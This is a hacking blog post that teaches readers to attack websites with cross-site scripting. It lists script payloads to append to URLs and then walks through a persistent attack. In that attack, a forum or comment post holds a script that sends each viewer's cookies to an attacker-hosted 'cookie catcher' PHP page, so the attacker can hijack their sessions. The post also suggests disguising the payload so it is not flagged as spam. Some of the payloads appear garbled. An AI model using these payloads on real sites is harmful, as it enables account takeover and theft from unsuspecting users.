Dear Readers: HWS has recently started a new project for the students of engineering ====> The Engineering Projects


Write at HWS !!!

Guest Posting

Wednesday, November 16, 2011

Hack Websites using XSS Attack


I have already posted about How to Hack Website Completely using SQL Injection and I have also  posted a Video Tutorial on it.Today I am going to start on XSS.I know most of the guys don't know even about its name so I am gonna start it from very basics to give you the whole concept of it .Hope you guys like it .

Introduction of XSS

  • XSS attack is used to hack websites online and it mostly works on those sites which use cookies for storing your username and password when you log in that site.Check this Wikipedia article for knowing what are cookies.
  • XSS usually works on those sites which allows users to add any code in an open place like starting new thread in forums or can send codes using messages to other members.It is actually a script / a code which attacker submit and whoever clicks or even see it got affected .
  • The purpose of the attacker or hacker doing XSS is to steal the cookie of a user, which is currently log in on that site and viewing that code submitted by the hacker, so that he can later use that cookie to get into his account . (Steal in this context means just get a copy of cookie, rather than removing the original cookie).
For Example : User A log in on a site and user B use XSS attack and gets the cookie of user A , now user B can easily come into the account of user A using these cookies ..... :))

Finding a XSS Vulnerable sites:

  • First of all,we need to find sites which are vulnerable to XSS attack.There are many such sites.
  • To find XSS vulnerable sites add a code after the link.Add below given codes after the site link to find whether the site is vulnerable or not :
Code:
"><script>alertundefineddocument.cookie)</script>
Code:
'><script>alertundefineddocument.cookie)</script>
Code:
"><script>alertundefined"Test")</script>
Code:
'><script>alertundefined"Test")</script>
Or a new one which i found out myself which you can inject HTML:
Code:
"><body bgcolor="FF0000"></body>
Code:
"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>
  • After adding these codes after the link if your site is http://www.example.com the link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script> and now press Enter.
  • Then if we see a javascript is pop up Or you saw the page's background go black Or a page of google opens in that site,it means we have come to a XSS vulnerable site.

Types of XSS Attack

  • There are two types of mostly used XSS attacks named :
  1. Persistent XSS
  2. Non-Persistent XSS

Persistent XSS:

  • This is the first type of XSS.In this method we will steal the victim's cookies with no suspect on us.
  • So,let us assume that we have found a XSS vulnerable forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS attack.
  • So now lets try to grab it's cookies.
  • First of all download a cookie catcher tool online by searching on google and upload it on any free hosting site which supports php .
  • Now come to that vulnerable site and if there is a box to type and submit then add the following code in it:
Code:<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
  • Replace the bold link with the link of your cookie catcher uploaded on free hosting site.
  • Now submit that post in the forum or the comment box and I would suggest to add some text before or after it so that it wont look like a spam.
  •  Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher .php 
  • Search for cookies.html which is a new file that show you the cookies. like if your cookie catcher link would be: http://www.example.com/cookie catcher.php the container of the cookies would be: http://www.example.com/cookies.html
  • Now save these cookies as we gonna use them to hijack session of victim.... ;)
That's all for today ,I will post more on it tomorrow in which we will check Non-persistent XSS and also check how to use these cookies to hijack the session of victim .If you have any question till now may ask in comments..... Take care ... :))

Update : I have posted the the second part of this tutorial named Hack Website using XSS Attack - Non Persistent  Method.

About the Author

I am XEO Hacker, the founder of Hack With Style (HWS). I am blogging since 2009 before that I just search things and now I am sharing my knowledge through this plateform.I'm also a freelance writer on topics related to Website Hacking,Website Optimization (SEO), blogger customizations and making money online.
In 61 people's circles

Subscribe To Get FREE Tutorials!


Respected Readers:
As a 21 year old student, the only income I rely on is my pocket money. Bearing the running costs of HWS Blog has become really difficult. We educate thousands of bloggers a week with our tutorials. To help us go forward with the same spirit, a small contribution from your side will highly be appreciated.

8 comments:

@Sheharyar ya man I will explain everything related to it .... have a little patience as I have to write the tutorial so its really very difficult and takes time .... :))

@fotograf nunta ya its worth giving a shot man .... ;))

pls post video tutorial on xss attack...........post some sites vurnable to xss......

DreamHost is one of the best web-hosting company with plans for any hosting requirements.

If you want your ex-girlfriend or ex-boyfriend to come crawling back to you on their knees (no matter why you broke up) you got to watch this video
right away...

(VIDEO) Win your ex back with TEXT messages?

Confused? Feel free to ask

Your feedback is always appreciated. I will try to reply to your queries as soon as time allows.
Note:-
Please do not spam Spam comments will be deleted immediately upon my review.

Regards,
XEO Hacker

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 

Recent Posts

Join Me On Facebook

700+ Followers

Followers


meet women in Ukraine contatore visite website counter
DMCA.com

Recent Comments

Follow Me On Twitter

1112+ Followers